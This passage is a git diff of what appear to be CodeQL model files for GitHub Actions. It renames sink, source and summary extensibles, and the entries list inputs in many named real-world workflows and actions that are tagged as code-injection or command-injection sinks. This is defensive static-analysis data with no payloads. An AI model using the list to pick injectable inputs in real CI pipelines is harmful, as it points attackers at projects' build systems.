b/ql/lib/ext/generated/reusable-workflows/thesofproject_sof.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["thesofproject/sof/.github/workflows/ipc_fuzzer.yml", "*", "input.fuzzing_duration_s", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml index deb10e5e4b4..9add4859f35 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiann_kernelsu.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiann/kernelsu/.github/workflows/ksud.yml", "*", "input.target", "code-injection", "generated"] - ["tiann/kernelsu/.github/workflows/avd-kernel.yml", "*", "input.manifest_name", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml index 5c22f0ffcb7..efc8097b963 100644 --- a/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tiledb-inc_tiledb.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tiledb-inc/tiledb/.github/workflows/ci-linux_mac.yml", "*", "input.asan", "code-injection", "generated"] - ["tiledb-inc/tiledb/.github/workflows/append-release-cmake.yml", "*", "input.ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml index 790e94c2aac..6a305522cfb 100644 --- a/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/toeverything_affine.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["toeverything/affine/.github/workflows/build-server-image.yml", "*", "input.flavor", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml index fedb21393bc..441325c76a5 100644 --- a/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tracel-ai_burn.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tracel-ai/burn/.github/workflows/publish-template.yml", "*", "input.crate", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml index f60fffb206e..5f0831afc07 100644 --- a/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/tribler_tribler.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["tribler/tribler/.github/workflows/pytest_custom_ipv8.yml", "*", "input.ipv8-git-ref", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml index c7fe932aba2..afd7aabc1fc 100644 --- a/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/ubisoft_sharpmake.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.framework", "code-injection", "generated"] - ["ubisoft/sharpmake/.github/workflows/build.yml", "*", "input.configuration", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml index d47aea3363f..49e556f585f 100644 --- a/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/unity-technologies_ml-agents.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["unity-technologies/ml-agents/.github/workflows/pytest.yml", "*", "input.pytest_markers", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml index f32acf5038e..24585aa50ed 100644 --- a/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/urbit_urbit.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.pace", "code-injection", "generated"] - ["urbit/urbit/.github/workflows/shared.yml", "*", "input.next", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml index c739b5750cc..afc7af28f9b 100644 --- a/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/uyuni-project_uyuni.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.server_id", "code-injection", "generated"] - ["uyuni-project/uyuni/.github/workflows/acceptance_tests_common.yml", "*", "input.secondary_tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml index 7ac3c0fb530..5b3d91a8a7b 100644 --- a/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vert-x3_vertx-hazelcast.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vert-x3/vertx-hazelcast/.github/workflows/it.yml", "*", "input.hz", "code-injection", "generated"] - ["vert-x3/vertx-hazelcast/.github/workflows/ci.yml", "*", "input.hz", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml index c641035f966..b43253eb619 100644 --- a/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/vkcom_vkui.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["vkcom/vkui/.github/workflows/reusable_workflow_test.yml", "*", "input.workspace", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml index adea8ae4bd2..89559cf57e3 100644 --- a/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/walletconnect_web3modal.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["walletconnect/web3modal/.github/workflows/ui_tests.yml", "*", "input.command", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml index 857c946e2b7..6292841e56a 100644 --- a/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/warzone2100_warzone2100.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["warzone2100/warzone2100/.github/workflows/publish_web_build.yml", "*", "input.architecture", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml index 717022ea6e8..9f98fd51139 100644 --- a/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wasmedge_wasmedge.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wasmedge/wasmedge/.github/workflows/reusable-create-source-tarball.yml", "*", "input.version", "code-injection", "generated"] - ["wasmedge/wasmedge/.github/workflows/reusable-build-on-windows.yml", "*", "input.version", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml index 7dadb99209d..e04605511b8 100644 --- a/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/web-infra-dev_rspack.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.profile", "code-injection", "generated"] - ["web-infra-dev/rspack/.github/workflows/reusable-build.yml", "*", "input.target", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml index ca3cb0091e9..a77181e6c4e 100644 --- a/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/werf_werf.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.excludePackages", "code-injection", "generated"] - ["werf/werf/.github/workflows/_test_unit.yml", "*", "input.packages", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml index 6faf8b90057..6c90e29a43b 100644 --- a/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/widdix_aws-cf-templates.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["widdix/aws-cf-templates/.github/workflows/acceptance-test-run.yml", "*", "input.tests", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml index 39b6773a2b1..6bacbc181da 100644 --- a/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/wildfly_wildfly.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.build-arguments", "code-injection", "generated"] - ["wildfly/wildfly/.github/workflows/shared-wildfly-build-and-test.yml", "*", "input.test-arguments", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml index cbbce950b41..83d438d4e3d 100644 --- a/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/yt-dlp_yt-dlp.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.target", "code-injection", "generated"] - ["yt-dlp/yt-dlp/.github/workflows/release.yml", "*", "input.source", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml index 48206551bcd..703a766cb4c 100644 --- a/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zenml-io_zenml.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zenml-io/zenml/.github/workflows/publish_docker_image.yml", "*", "input.config_file", "code-injection", "generated"] - ["zenml-io/zenml/.github/workflows/integration-test-slow.yml", "*", "input.test_environment", "code-injection", "generated"] diff --git a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml index 256ad3f0e04..ecb4c809efe 100644 --- a/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zephyrproject-rtos_zephyr.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zephyrproject-rtos/zephyr/.github/workflows/ready-to-merge.yml", "*", "input.needs_context", "code-injection", "generated"] \ No newline at end of file diff --git a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml index ae408b131e0..9b02577be7d 100644 --- a/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml +++ b/ql/lib/ext/generated/reusable-workflows/zitadel_zitadel.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.image_name", "code-injection", "generated"] - ["zitadel/zitadel/.github/workflows/release.yml", "*", "input.build_image_name", "code-injection", "generated"] @@ -9,6 +9,6 @@ extensions: - ["zitadel/zitadel/.github/workflows/compile.yml", "*", "input.version", "code-injection", "generated"] - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["zitadel/zitadel/.github/workflows/container.yml", "*", "input.build_image_name", "output.build_image", "taint", "manual"] diff --git a/ql/lib/ext/getsentry_action-release.model.yml b/ql/lib/ext/getsentry_action-release.model.yml index c7e2cf41b3f..1ffc3df1c81 100644 --- a/ql/lib/ext/getsentry_action-release.model.yml +++ b/ql/lib/ext/getsentry_action-release.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["getsentry/action-release", "*", "input.version", "output.version", "taint", "manual"] - ["getsentry/action-release", "*", "input.version_prefix", "output.version", "taint", "manual"] diff --git a/ql/lib/ext/github_codeql-action.model.yml b/ql/lib/ext/github_codeql-action.model.yml index 781384a2fe1..53ed1840b0a 100644 --- a/ql/lib/ext/github_codeql-action.model.yml +++ b/ql/lib/ext/github_codeql-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["github/codeql-action", "*", "input.output", "output.sarif-output", "taint", "manual"] diff --git a/ql/lib/ext/go-semantic-release_action.model.yml b/ql/lib/ext/go-semantic-release_action.model.yml index 9036f199f42..17d2ed2e473 100644 --- a/ql/lib/ext/go-semantic-release_action.model.yml +++ b/ql/lib/ext/go-semantic-release_action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["go-semantic-release/action", "*", "input.bin", "command-injection", "manual"] diff --git a/ql/lib/ext/golangci_golangci-lint-action.model.yml b/ql/lib/ext/golangci_golangci-lint-action.model.yml index 7eee95dbcce..68c2552c350 100644 --- a/ql/lib/ext/golangci_golangci-lint-action.model.yml +++ b/ql/lib/ext/golangci_golangci-lint-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["golangci/golangci-lint-action", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml index 4fe9e32ce52..977f6b98ae4 100644 --- a/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml +++ b/ql/lib/ext/gonuit_heroku-docker-deploy.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gonuit/heroku-docker-deploy", "*", "input.email", "command-injection", "manual"] - ["gonuit/heroku-docker-deploy", "*", "input.heroku_api_key", "command-injection", "manual"] diff --git a/ql/lib/ext/goreleaser_goreleaser-action.model.yml b/ql/lib/ext/goreleaser_goreleaser-action.model.yml index 0352ece87b5..616f7fdb9ca 100644 --- a/ql/lib/ext/goreleaser_goreleaser-action.model.yml +++ b/ql/lib/ext/goreleaser_goreleaser-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["goreleaser/goreleaser-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml index 712f2ce3395..e4961ae5ed6 100644 --- a/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml +++ b/ql/lib/ext/gr2m_create-or-update-pull-request-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["gr2m/create-or-update-pull-request-action", "*", "input.branch", "command-injection", "manual"] - ["gr2m/create-or-update-pull-request-action", "*", "input.path", "command-injection", "manual"] diff --git a/ql/lib/ext/gradle_gradle-build-action.model.yml b/ql/lib/ext/gradle_gradle-build-action.model.yml index 45c00c1c30e..19cce83c691 100644 --- a/ql/lib/ext/gradle_gradle-build-action.model.yml +++ b/ql/lib/ext/gradle_gradle-build-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["gradle/gradle-build-action", "*", "input.cache-encryption-key", "env.GRADLE_ENCRYPTION_KEY", "taint", "manual"] - ["gradle/gradle-build-action", "*", "input.build-scan-terms-of-service-agree", "env.BUILD_SCAN_TERMS_OF_SERVICE_AGREE", "taint", "manual"] diff --git a/ql/lib/ext/haya14busa_action-cond.model.yml b/ql/lib/ext/haya14busa_action-cond.model.yml index 8f05918155e..f838eeed0eb 100644 --- a/ql/lib/ext/haya14busa_action-cond.model.yml +++ b/ql/lib/ext/haya14busa_action-cond.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["haya14busa/action-cond", "*", "input.if_true", "output.value", "taint", "manual"] - ["haya14busa/action-cond", "*", "input.if_false", "output.value", "taint", "manual"] diff --git a/ql/lib/ext/hexlet_project-action.model.yml b/ql/lib/ext/hexlet_project-action.model.yml index 708c310c05f..48e5b05128f 100644 --- a/ql/lib/ext/hexlet_project-action.model.yml +++ b/ql/lib/ext/hexlet_project-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["hexlet/project-action", "*", "input.mount-path", "env.PWD", "taint", "manual"] diff --git a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml index 76177635899..448997b3136 100644 --- a/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml +++ b/ql/lib/ext/ilammy_msvc-dev-cmd.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ilammy/msvc-dev-cmd", "*", "input.vsversion", "command-injection", "manual"] - ["ilammy/msvc-dev-cmd", "*", "input.arch", "command-injection", "manual"] diff --git a/ql/lib/ext/ilammy_setup-nasm.model.yml b/ql/lib/ext/ilammy_setup-nasm.model.yml index 7106115c17a..13af446f37d 100644 --- a/ql/lib/ext/ilammy_setup-nasm.model.yml +++ b/ql/lib/ext/ilammy_setup-nasm.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["ilammy/setup-nasm", "*", "input.version", "command-injection", "manual"] - ["ilammy/setup-nasm", "*", "input.destination", "command-injection", "manual"] diff --git a/ql/lib/ext/imjohnbo_issue-bot.model.yml b/ql/lib/ext/imjohnbo_issue-bot.model.yml index 366e5dd1766..39e1c9ef624 100644 --- a/ql/lib/ext/imjohnbo_issue-bot.model.yml +++ b/ql/lib/ext/imjohnbo_issue-bot.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["imjohnbo/issue-bot", "*", "input.body", "code-injection", "manual"] - ["imjohnbo/issue-bot", "*", "input.linked-comments-previous-issue-text", "code-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-cml.model.yml b/ql/lib/ext/iterative_setup-cml.model.yml index a469063fc50..a442ed5cd53 100644 --- a/ql/lib/ext/iterative_setup-cml.model.yml +++ b/ql/lib/ext/iterative_setup-cml.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["iterative/setup-cml", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/iterative_setup-dvc.model.yml b/ql/lib/ext/iterative_setup-dvc.model.yml index d0d5b57574b..a22fce01c45 100644 --- a/ql/lib/ext/iterative_setup-dvc.model.yml +++ b/ql/lib/ext/iterative_setup-dvc.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["iterative/setup-dvc", "*", "input.version", "command-injection", "manual"] diff --git a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml index 3151e335d22..74a5c7d592c 100644 --- a/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml +++ b/ql/lib/ext/jamesives_github-pages-deploy-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jamesives/github-pages-deploy-action", "*", "input.branch", "command-injection", "manual"] - ["jamesives/github-pages-deploy-action", "*", "input.commit-message", "command-injection", "manual"] diff --git a/ql/lib/ext/jitterbit_get-changed-files.model.yml b/ql/lib/ext/jitterbit_get-changed-files.model.yml index e74f953a1a1..e78dfb3b073 100644 --- a/ql/lib/ext/jitterbit_get-changed-files.model.yml +++ b/ql/lib/ext/jitterbit_get-changed-files.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["jitterbit/get-changed-files", "*", "output.all", "filename", "manual"] - ["jitterbit/get-changed-files", "*", "output.added", "filename", "manual"] diff --git a/ql/lib/ext/johnnymorganz_stylua-action.model.yml b/ql/lib/ext/johnnymorganz_stylua-action.model.yml index 0930fc246c3..29dac5cffea 100644 --- a/ql/lib/ext/johnnymorganz_stylua-action.model.yml +++ b/ql/lib/ext/johnnymorganz_stylua-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["johnnymorganz/stylua-action", "*", "input.args", "command-injection", "manual"] diff --git a/ql/lib/ext/jsdaniell_create-json.model.yml b/ql/lib/ext/jsdaniell_create-json.model.yml index 5b344799ad9..f2331633485 100644 --- a/ql/lib/ext/jsdaniell_create-json.model.yml +++ b/ql/lib/ext/jsdaniell_create-json.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jsdaniell/create-json", "*", "input.name", "output.successfully", "taint", "manual"] - ["jsdaniell/create-json", "*", "input.json", "output.successfully", "taint", "manual"] diff --git a/ql/lib/ext/jurplel_install-qt-action.model.yml b/ql/lib/ext/jurplel_install-qt-action.model.yml index 5b6f1342fc4..e492f601278 100644 --- a/ql/lib/ext/jurplel_install-qt-action.model.yml +++ b/ql/lib/ext/jurplel_install-qt-action.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jurplel/install-qt-action", "*", "input.version", "command-injection", "manual"] - ["jurplel/install-qt-action", "*", "input.arch", "command-injection", "manual"] diff --git a/ql/lib/ext/jwalton_gh-ecr-push.model.yml b/ql/lib/ext/jwalton_gh-ecr-push.model.yml index b34833d85f3..a821b049232 100644 --- a/ql/lib/ext/jwalton_gh-ecr-push.model.yml +++ b/ql/lib/ext/jwalton_gh-ecr-push.model.yml @@ -1,12 +1,12 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "output.imageUrl", "taint", "manual"] - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["jwalton/gh-ecr-push", "*", "input.image", "command-injection", "manual"] - ["jwalton/gh-ecr-push", "*", "input.local-image", "command-injection", "manual"] diff --git a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml index 9a58d9a764f..4f9f887caf1 100644 --- a/ql/lib/ext/khan_pull-request-comment-trigger.model.yml +++ b/ql/lib/ext/khan_pull-request-comment-trigger.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sourceModel + extensible: actionsSourceModel data: - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] - ["khan/pull-request-comment-trigger", "*", "output.comment_body", "text", "manual"] diff --git a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml index 74ef5820cb7..365f3ac98f8 100644 --- a/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml +++ b/ql/lib/ext/larsoner_circleci-artifacts-redirector-action.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: summaryModel + extensible: actionsSummaryModel data: - ["larsoner/circleci-artifacts-redirector-action", "*", "input.artifact-path", "output.url", "taint", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-lua.model.yml b/ql/lib/ext/leafo_gh-actions-lua.model.yml index e05a3afd63a..f42e8465533 100644 --- a/ql/lib/ext/leafo_gh-actions-lua.model.yml +++ b/ql/lib/ext/leafo_gh-actions-lua.model.yml @@ -1,7 +1,7 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leafo/gh-actions-lua", "*", "input.luaVersion", "command-injection", "manual"] - ["leafo/gh-actions-lua", "*", "input.luaCompileFlags", "command-injection", "manual"] diff --git a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml index a96ad45d624..e21b5224166 100644 --- a/ql/lib/ext/leafo_gh-actions-luarocks.model.yml +++ b/ql/lib/ext/leafo_gh-actions-luarocks.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["leafo/gh-actions-luarocks", "*", "input.withLuaPath", "command-injection", "manual"] diff --git a/ql/lib/ext/lucasbento_auto-close-issues.model.yml b/ql/lib/ext/lucasbento_auto-close-issues.model.yml index a70e8facf7c..6c4a5931b98 100644 --- a/ql/lib/ext/lucasbento_auto-close-issues.model.yml +++ b/ql/lib/ext/lucasbento_auto-close-issues.model.yml @@ -1,6 +1,6 @@ extensions: - addsTo: pack: githubsecuritylab/actions-all - extensible: sinkModel + extensible: actionsSinkModel data: - ["lucasbento/auto-close-issues", "*", "input.issue-close-message", "code-injection", "manual"] \ No newline at end of file diff --git a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml b/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml index 66280f8bdd6..c7e89697afb 100644 --- a/ql/lib/ext/mad9000_actions-find-and-replace-string.model.yml +++ 